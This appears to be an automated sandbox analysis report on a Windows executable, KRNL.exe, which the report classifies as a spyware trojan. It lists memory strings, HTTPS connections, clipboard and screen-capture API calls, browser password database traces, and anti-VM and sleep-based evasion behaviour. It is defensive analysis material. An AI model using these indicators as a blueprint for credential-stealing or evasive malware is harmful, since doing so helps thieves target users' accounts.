                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: KRNL.exe, 00000002.00000003.1712083330.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: KRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: KRNL.exe, 00000002.00000003.1712222118.0000000005A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: KRNL.exe | String found in binary or memory: https://www.entrust.net/rpa0
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptc;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
                    Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_058A1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043328C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006E1000
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006EF555
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_00707792
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_00705C5E
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006F9CC0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006F3FB2
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042C8D0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040A8B0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043F150
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00437960
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043B1D0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00410247
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040B262
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043FB10
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00409C6F
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00437CF0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00421570
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00426520
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00423675
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040C621
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004116A0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00424060
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041602C
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004190D1
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004038F0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004320B0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043B940
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00414161
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00418170
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00437170
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041717B
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00409100
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041D900
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043E920
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00405930
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00419930
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043E9D0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004151A9
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040E9B0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004061B0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004269B0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043EA60
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00415A72
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042F211
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042822F
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004082C0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00425ACF
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00425A90
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004042A0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041CAA0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040EB3B
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004373D0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00404BE0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041138A
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041E390
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00423C40
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043F450
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042CC5D
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00430470
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00407410
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00427C29
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00410C83
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042B48C
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004164A3
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00427551
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00436569
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00409570
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042BD77
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0040F529
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041DDC0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041ADD0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042F5D9
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004285E1
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00406640
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00438E40
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043B650
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00431E50
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042CE60
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043DE19
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00429630
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042BE3B
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00423EC0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004386C0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00402ED0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00435ED3
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042DEF1
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0042BE9D
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00416777
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0041B729
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00438FD9
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043F780
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004177AD
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006E1000
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006EF555
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00707792
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00705C5E
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006F9CC0
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006F3FB2
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 006F80F8 appears 42 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 006F0730 appears 38 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 00413CD0 appears 75 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 006FCFD6 appears 40 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 00407FA0 appears 46 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 006EFA60 appears 100 times
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: String function: 006EFAE4 appears 34 times
                    Source: KRNL.exe | Static PE information: invalid certificate
                    Source: KRNL.exe, 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000002.00000000.1675548186.000000000076D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000002.00000003.1675825839.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KRNL.exe | Static PE information: Section: .bss ZLIB complexity 1.0003298756270902
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/1@12/2
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00437CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
                    Source: KRNL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\KRNL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: KRNL.exe, 00000002.00000003.1712400298.0000000005A45000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711739923.0000000005A77000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: KRNL.exe | Virustotal: Detection: 40%
                    Source: KRNL.exe | ReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\KRNL.exe | File read: C:\Users\user\Desktop\KRNL.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"
                    Source: C:\Users\user\Desktop\KRNL.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KRNL.exe | Process created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: webio.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\KRNL.exe | Section loaded: version.dll
                    Source: KRNL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: KRNL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: KRNL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: KRNL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: KRNL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: KRNL.exe | Static PE information: real checksum: 0x8e247 should be: 0x97536
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006EFB83 push ecx; ret 0_2_006EFB96
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_004479FC push edi; retf 2_2_004479FD
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00447371 push 084300B2h; ret 2_2_0044739E
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00444D1C push eax; retf 2_2_00444D1E
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00447D95 pushad ; iretd 2_2_00447FDD
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043B5B0 push eax; mov dword ptr [esp], 31A531AAh 2_2_0043B5BE
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043E6B0 push eax; mov dword ptr [esp], 352E36E1h 2_2_0043E6B3
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00446F14 push ebp; ret 2_2_00446F15
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006EFB83 push ecx; ret 2_2_006EFB96
                    Source: C:\Users\user\Desktop\KRNL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\KRNL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\KRNL.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\KRNL.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\KRNL.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\KRNL.exe | Window / User API: threadDelayed 6702
                    Source: C:\Users\user\Desktop\KRNL.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-21459
                    Source: C:\Users\user\Desktop\KRNL.exe | API coverage: 9.4 %
                    Source: C:\Users\user\Desktop\KRNL.exe TID: 2492 | Thread sleep time: -210000s >= -30000s
                    Source: C:\Users\user\Desktop\KRNL.exe TID: 4944 | Thread sleep count: 6702 > 30
                    Source: C:\Users\user\Desktop\KRNL.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\KRNL.exe | Last function: Thread delayed
